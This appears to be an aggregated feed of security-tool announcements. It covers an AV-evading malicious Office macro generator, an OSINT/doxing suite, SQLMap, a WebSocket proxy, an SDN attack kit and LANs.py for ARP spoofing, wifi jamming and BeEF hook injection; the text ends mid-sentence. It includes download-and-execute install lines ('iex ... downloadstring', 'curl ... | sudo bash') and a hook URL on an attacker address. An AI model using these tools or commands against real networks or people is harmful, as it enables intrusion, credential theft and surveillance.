Luckystrike – A PowerShell based utility for the creation of malicious Office macro documents

A PowerShell based utility for the creation of malicious Office macro documents. To be used for pentesting or educational purposes only.Luckystrike is a menu-drive (SET style) PowerShell-based generator of malicious .xls and .doc documents. All your payloads are saved into a database for easy retrieval & embedding into a new or existing document. Luckystrike provides you several infection methods designed to get your payloads to execute without tripping AV. See the “Installation" section below for instructions on getting started.Initial Blog Post & Demonstration: https://www.shellntel.com/blog/2016/9/13/luckystrike-a-database-backed-evil-macro-generatorDerbyCon 6.0 Tool Drop Talk: https://www.youtube.com/watch?v=1Yzg1xps2kE Installation RequirementsWindows 7/10 (preferably x64)PowerShell v5+Microsoft Office 2010+ installedTo install, execute the following command from an administrative PowerShell prompt (Required to install the PSSQLite module). A luckystrike directory will be created automatically.iex (new-object net.webclient).downloadstring(‘https://git.io/v7kbp’)To run, simply cd to the luckystrike directory, then .\luckystrike.ps1 UprgradingLuckystrike will check for updates upon opening. You will be prompted to update. Any templates and payloads you have in the database are preserved.Download Luckystrike

Link: http://feedproxy.google.com/~r/PentestTools/~3/it_yxPS7usE/luckystrike-powershell-based-utility.html

D0xk1t – Web-based OSINT and Active Reconaissance Suite

Active reconnaissance, information gathering and OSINT built in a portable web application.1.0 IntroductionWhat is this?D0xk1t is an open-source, self-hosted and easy to use OSINT and active reconnaissance web application for penetration testers. Based off of the prior command-line script, D0xk1t is now fully capable of conducting reconnaissance and penetration testing for security researchers who need a framework without the head-scratching.Is this a website / web-app ?Yes and no. In essence, it is not a typical website. D0xk1t is self-hosted. There is no server stack, cloud-based service, SaaS, etc. that is holding it up. You can have the option of deploying D0xk1t on a local network or deploying your own instance on any infrastructure/technology as you wish (although not recommended).Is this free?Yes. D0xk1t will forever be open-source. If you wish to contribute, you can make a fork, add any changes, and send a pull request on Github.2.0 FeaturesEasy-to-build, risk-free installationSimple Bootstrap Admin DashboardDeployable to the InternetServerless (at the moment)Expansive to any OS3.0 InstallationSince D0xk1t is self-hosted, it does not work immediately out-of-box. It is recommended that you use a virtualenv container due to the sheer number of dependencies that can run into conflict with your Python configuration.3.1 BuildingLucky for you, there are two ways to build D0xk1t. The quick ‘n easy way, and the manual way.Quick ‘n Easy Way: $ curl https://raw.githubusercontent.com/ex0dus-0x/D0xk1t/master/extras/install | sudo /bin/bash Manual Way:$ git clone https://github.com/ex0dus-0x/D0xk1t && cd D0xk1t$ # Start virtualenv if you wish$ pip install -r requirements.txt$ python run.py3.2 ConfigurationOpen config.py. Here, you will see all the environmental variables that the application utilizes. Three important fields you MUST be aware of if you plan to deploy to the web.GOOGLEMAPS_API_KEY = “YOUR_API_KEY_HERE"SECRET_KEY = ‘SECRET_KEY_HERE’GOOGLEMAPS_API_KEY denotes the Google Maps API Key. This is essential for the GeoIP module. You can obtain it here and change the variable accordingly.SECRET_KEY is the private key utilized by WTForm’s CSRF protection feature. If deployed, change it to your liking.3.3 DeploymentOnce installed, run with python run.py. The application will run a first-time boot, and will then be accessible at 127.0.0.1:5000. Login with credentials, and you will be present with the admin panel.Of course, this is self-hosting on localhost. Although work-in-progress, D0xk1t will soon support hosting on a variety of SaaS and server stacks of your choice.Heroku – TODO: build a Procfile, as well as bash scripts for automatic deploymentngrok – TODO: build a script for deployment to ngrok4.0 ModulesD0x ModuleThe D0x module is a comprehensive info-gathering database that enables the pentester to write "D0x", or a file that holds a collection of data of a certain target, or targets. Using this data, the tester will be able to effectively understand their target, which is a critical point in the attacker’s kill chain. D0xing is usually deemed malicious and black-hat in nature. However, with the D0x module, we aim to help security researchers gain momentum when conducting in-the-field pentesting.The D0x module does come with several features, improved upon based off of the prior revision.Secure database support, with delete and export (as .csv) optionsGeoIP ModuleWhen working with metadata, IP addresses often pop up as a point-of-interest. Using Maxmind and Google Map’s APIs, the GeoIP module aims to collect geolocation information on public IP addresses, in order to gather data on physical location during the reconnaissance stage of the killchain.Google Maps support for accurate GeoIP visualizationAPI endpoint support for command-liners or developers.Download D0xk1t

Link: http://feedproxy.google.com/~r/PentestTools/~3/6Ep1C3ljyVE/d0xk1t-web-based-osint-and-active.html

sdnpwn – An SDN Penetration Testing Toolkit

The Open Networking Foundation defines SDN as “The physical separation of the network control plane from the forwarding plane, and where a control plane controls several devices”. What this means is that the decision making which would traditionally be performed by a router or a switch (i.e. forwarding decisions), is moved to a central device known as a controller. Routers and switches become generic forwarding devices (also known simply as ‘switches’). These forwarding devices, or switches, communicate with the controller at the Southbound Interface (SBI) in order to receive instructions on how to forward network traffic. Applications may communicate with the controller at the Northbound Interface (NBI) to receive network statistics or influence traffic forwarding decisions.sdnpwn is a toolkit and framework for testing the security of Software-Defined Networks (SDNs). InstallationFirst download sdnpwn using gitgit clone https://github.com/smythtech/sdnpwnMake the sdnpwn.py and setup.sh scripts executablesudo chmod +x sdnpwn.pysudo chmod +x setup.shThe setup.sh script takes care installing software required for sdnpwn to function. Just run ./setup.sh and follow the instructions.sudo ./setup.shUsageFunctionality in sdnpwn is divided into different modules. Each attack or attack type is available from a certain module.Modules can be executed like so:./sdnpwn.py <module options>The mods module can be used to list all available modules:./sdnpwn.py modsMore information about a certain module can be accessed using the info module:./sdnpwn.py info modsThe above command would retrieve more information about the mods module, such as a description and available options.Further InformationCheck out https://sdnpwn.net for articles and tutorials on using various sdnpwn modules and the attacks they use.Download sdnpwn

Link: http://feedproxy.google.com/~r/PentestTools/~3/tAmAPbAi_y0/sdnpwn-sdn-penetration-testing-toolkit.html

WSSiP – Application for capturing, modifying and sending custom WebSocket data from client to server and vice versa

Short for “WebSocket/Socket.io Proxy", this tool, written in Node.js, provides a user interface to capture, intercept, send custom messages and view all WebSocket and Socket.IO communications between the client and server.Upstream proxy support also means you can forward HTTP/HTTPS traffic to an intercepting proxy of your choice (e.g. Burp Suite or Pappy Proxy) but view WebSocket traffic in WSSiP. More information can be found on the blog post.There is an outward bridge via HTTP to write a fuzzer in any language you choose to debug and fuzz for security vulnerabilities.InstallationFrom Packaged ApplicationSee Releases.From npm/yarn (for CLI commands)Run the following in your command line:npm:# Install Electron globallynpm i -g electron@1.7# Install wssip global for "wssip" commandnpm i -g wssip# Launch!wssipyarn: (Make sure the directory in yarn global bin is in your PATH)yarn global add electron@1.7yarn global add wssipwssipYou can also run npm install electron (or yarn add electron) inside the installed WSSiP directory if you do not want to install Electron globally, as the app packager requires Electron be added to developer dependencies.From SourceUsing a command line:# Clone repository locallygit clone https://github.com/nccgroup/wssip# Change to the directorycd wssip# If you are developing for WSSiP:# npm i# If not… (as to minimize disk space):npm i electron@1.7npm i –production# Start application:npm startUsageOpen the WSSiP application.WSSiP will start listening automatically. This will default to localhost on port 8080.Optionally, use Tools > Use Upstream Proxy to use another intercepting proxy to view web traffic.Configure the browser to point to http://localhost:8080/ as the HTTP Proxy.Navigate to a page using WebSockets. A good example is the WS Echo Demonstration.???Potato.FuzzingWSSiP provides an HTTP bridge via the man-in-the-middle proxy for custom applications to help fuzz a connection. These are accessed over the proxy server.A few of the simple CA certificate downloads are:http://mitm/ca.pem / http://mitm/ca.der (Download CA Certificate)http://mitm/ca_pri.pem / http://mitm/ca_pri.der (Download Private Key)http://mitm/ca_pub.pem / http://mitm/ca_pub.der (Download Public Key)Get WebSocket Connection InfoReturns whether the WebSocket id is connected to a web server, and if so, return information. URLGET http://mitm/ws/:id URL Params id=[integer] Success Response (Not Connected) Code: 200 Content: {connected: false} Success Response (Connected) Code: 200 Content: {connected: true, url: ‘ws://echo.websocket.org’, bytesReceived: 0, extensions: {}, readyState: 3, protocol: ”, protocolVersion: 13}Send WebSocket DataSend WebSocket data. URLPOST http://mitm/ws/:id/:sender/:mode/:type?log=:log URL Params Required: id=[integer] sender one of client or server mode one of message, ping or pong type one of ascii or binary (text is an alias of ascii) Optional: log either true or y to log in the WSSiP application. Errors will be logged in the WSSiP application instead of being returned via the REST API. Data ParamsRaw data in the POST field will be sent to the WebSocket server. Success Response: Code: 200 Content: {success: true} Error Response: Code: 500 Content: {success: false, reason: ‘Error message’}Download WSSiP

Link: http://feedproxy.google.com/~r/PentestTools/~3/E20rnhGZbbU/wssip-application-for-capturing.html

How to run Android Apps on Mac

Even if most of the people now use mobile phones, desktops still have considerable users. Many people still prefer large screen for most of the tasks. Most of the people who own Mac prefer iPhone. It is because MacOS and iOS are deeply integrated to give you good feature and easy sync. However, Android is […]
The post How to run Android Apps on Mac appeared first on UseThisTip.

Link: http://feedproxy.google.com/~r/blogspot/csAFg/~3/99W6gSU6rV0/how-to-run-android-apps-on-mac.html

Sobelow – Security-Focused Static Analysis for the Phoenix Framework

Sobelow is a security-focused static analysis tool for the Phoenix framework. For security researchers, it is a useful tool for getting a quick view of points-of-interest. For project maintainers, it can be used to prevent introducing a number of common vulnerabilities.Currently Sobelow detects some types of the following security issues:Insecure configurationKnown-vulnerable DependenciesCross-Site ScriptingSQL injectionCommand injectionDenial of ServiceDirectory traversalUnsafe serializationPotential vulnerabilities are flagged in different colors according to confidence in their insecurity. High confidence is red, medium confidence is yellow, and low confidence is green.A finding is typically marked “low confidence" if it looks like a function could be used insecurely, but it cannot reliably be determined if the function accepts user-supplied input. That is to say, green findings are not secure, they just require greater manual validation.Note: This project is in constant development, and additional vulnerabilities will be flagged as time goes on. If you encounter a bug, or would like to request additional features or security checks, please open an issue!InstallationTo install Sobelow, you must have a working Elixir environment. Then, execute the following from the command line:$ mix archive.install hex sobelowYou may also install directly from GitHub with the following command:$ mix archive.install github nccgroup/sobelowUseThe simplest way to scan a Phoenix project is to run the following from the project root:$ mix sobelowOptions–root -r – Specify application root directory–with-code -v – Print vulnerable code snippets–ignore -i – Ignore modules–ignore-files – Ignore files–details -d – Get module details–all-details – Get all module details–private – Skip update checks–router – Specify router location–exit – Return non-zero exit status–format -f – Specify findings output format–quiet – Return no output if there are no findings–compact – Minimal, single-line findingsThe root option takes a path argument:$ mix sobelow –root ../my_projectThe with-code option takes no arguments:$ mix sobelow –with-codeThe ignore option takes a comma-separated list of modules:$ mix sobelow -i XSS.Raw,TraversalThe ignore-files option takes a comma-separated list of file names. File names should be absolute paths, or relative to the application root.$ mix sobelow –ignore-files config/prod.exsThe details option takes a single module:$ mix sobelow -d Config.CSRFThe exit option accepts a confidence threshold (low, medium, or high), and will return a non-zero exit status at or above that threshold.$ mix sobelow –exit LowThe format option accepts an output format for findings. Current formats include txt (the default) and json.Note: The json format option does not support the –with-code flag. All findings are organized by confidence level, and contain a "type" key. However, other keys may vary between finding types.$ mix sobelow –format jsonConfiguration FilesSobelow allows users to save frequently used options in a configuration file. For example, if you find yourself constantly running:$ mix sobelow -i XSS.Raw,Traversal –with-code –exit LowYou can use the –save-config flag to create your .sobelow-conf config file:$ mix sobelow -i XSS.Raw,Traversal –with-code –exit Low –save-configThis command will create the .sobelow-conf file at the root of your application. You can edit this file directly to make changes.Now if you want to run Sobelow with the saved configuration, you can run Sobelow with the –config flag.$ mix sobelow –configFalse PositivesSobelow favors over-reporting versus under-reporting. As such, you may find a number of false positives in a typical scan. These findings may be individually ignored by adding a # sobelow_skip comment, along with a list of modules, before the function definition.# sobelow_skip ["Traversal"]def vuln_func(…) do …endThen, run the scan with the –skip flag.$ mix sobelow –skipConfig and Vulnerable Dependency findings cannot be skipped in this way. For these, use the standard ignore option.ModulesFindings categories are broken up into modules. These modules can then be used to either ignore classes of findings (via the ignore and skip options) or to get vulnerability details (via the details option).This list, and other helpful information, can be found on the command line:$ mix help sobelowUpdatesWhen scanning a project, Sobelow will occasionally check for updates, and will print an alert if a new version is available. Sobelow keeps track of the last update-check by creating a .sobelow file in the root of the scanned project.If this functionality is not desired, the –private flag can be used with the scan.$ mix sobelow –privateDownload Sobelow

Link: http://feedproxy.google.com/~r/PentestTools/~3/w1yDssiShnE/sobelow-security-focused-static.html

SQLMap v1.1.8 – Automatic SQL Injection And Database Takeover Tool

SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.FeaturesFull support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry.Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass.Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.InstallationYou can download the latest tarball by clicking here or latest zipball by clicking here.Preferably, you can download sqlmap by cloning the Git repository:git clone –depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-devsqlmap works out of the box with Python version 2.6.x and 2.7.x on any platform.UsageTo get a list of basic options and switches use:python sqlmap.py -hTo get a list of all options and switches use:python sqlmap.py -hhYou can find a sample run here. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the user’s manual.LinksHomepage: http://sqlmap.orgDownload: .tar.gz or .zipCommits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atomIssue tracker: https://github.com/sqlmapproject/sqlmap/issuesUser’s manual: https://github.com/sqlmapproject/sqlmap/wikiFrequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQTwitter: @sqlmapDemos: http://www.youtube.com/user/inquisb/videosScreenshots: https://github.com/sqlmapproject/sqlmap/wiki/ScreenshotsTranslationsBulgarianChineseCroatianFrenchGreekIndonesianItalianJapanesePortugueseSpanishTurkishDownload SQLMap v1.1.8

Link: http://feedproxy.google.com/~r/PentestTools/~3/GloCOjGOwrc/sqlmap-v118-automatic-sql-injection-and.html

LANs.py – Inject Code, Jam Wifi, And Spy on Wifi Users

LANs.pyAutomatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit. Individually poisons the ARP tables of the target box, the router and the DNS server if necessary. Does not poison anyone else on the network. Displays all most the interesting bits of their traffic and can inject custom html into pages they visit. Cleans up after itself.Also can be used to continuously jam nearby WiFi networks. This has an approximate range of a 1 block radius, but this can vary based off of the strength of your WiFi card. This can be fine-tuned to allow jamming of everyone or even just one client. Cannot jam WiFi and spy simultaneously. Prerequisites: Linux, python-scapy, python-nfqueue (nfqueue-bindings 0.4-3), aircrack-ng, python-twisted, BeEF (optional), nmap, nbtscan, tcpdump, and a wireless card capable of promiscuous mode if you don’t know the IP of your target.Tested on Kali. In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim.All options:Python LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC] [-d] [-v] [-dns DNSSPOOF] [-a] [-set] [-p] [-na] [-n] [-i INTERFACE] [-r REDIRECTTO] [-rip ROUTERIP] [-rmac ROUTERMAC] [-pcap PCAP] [-s SKIP] [-ch CHANNEL] [-m MAXIMUM] [-no] [-t TIMEINTERVAL] [–packets PACKETS] [–directedonly] [–accesspoint ACCESSPOINT]UsageCommon usage:python LANs.py -u -pActive target identification which ARP spoofs the chosen target and outputs all the interesting non-HTTPS data they send or request. There’s no -ip option so this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network. Attempts to tag the targets with a Windows netbios name and prints how many data packets they are sending/receiving. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. Ctrl-C when you’re ready and pick your target which it will then ARP spoof.Supports interception and harvesting of data from the following protocols: HTTP, FTP, IMAP, POP3, IRC. Will print the first 135 characters of URLs visited and ignore URLs ending in .jpg, .jpeg, .gif, .css, .ico, .js, .svg, and .woff. Will also print all protocol username/passwords entered, searches made on any site, emails sent/received, and IRC messages sent/received.Screenshot: Running LANs.py without argument will give you the list of active targets and upon selecting one, it will act as a simple ARP spoofer.Another common usage:python LANs.py -u -p -d -ip 192.168.0.10-d: open an xterm with driftnet to see all images they view-ip: target this IP address and skip the active targeting at the beginningHTML injection:python LANs.py -b http://192.168.0.5:3000/hook.jsInject a BeEF hook URL (http://beefproject.com/, tutorial: http://resources.infosecinstitute.com/beef-part-1/) into pages the victim visits. This just wraps the argument in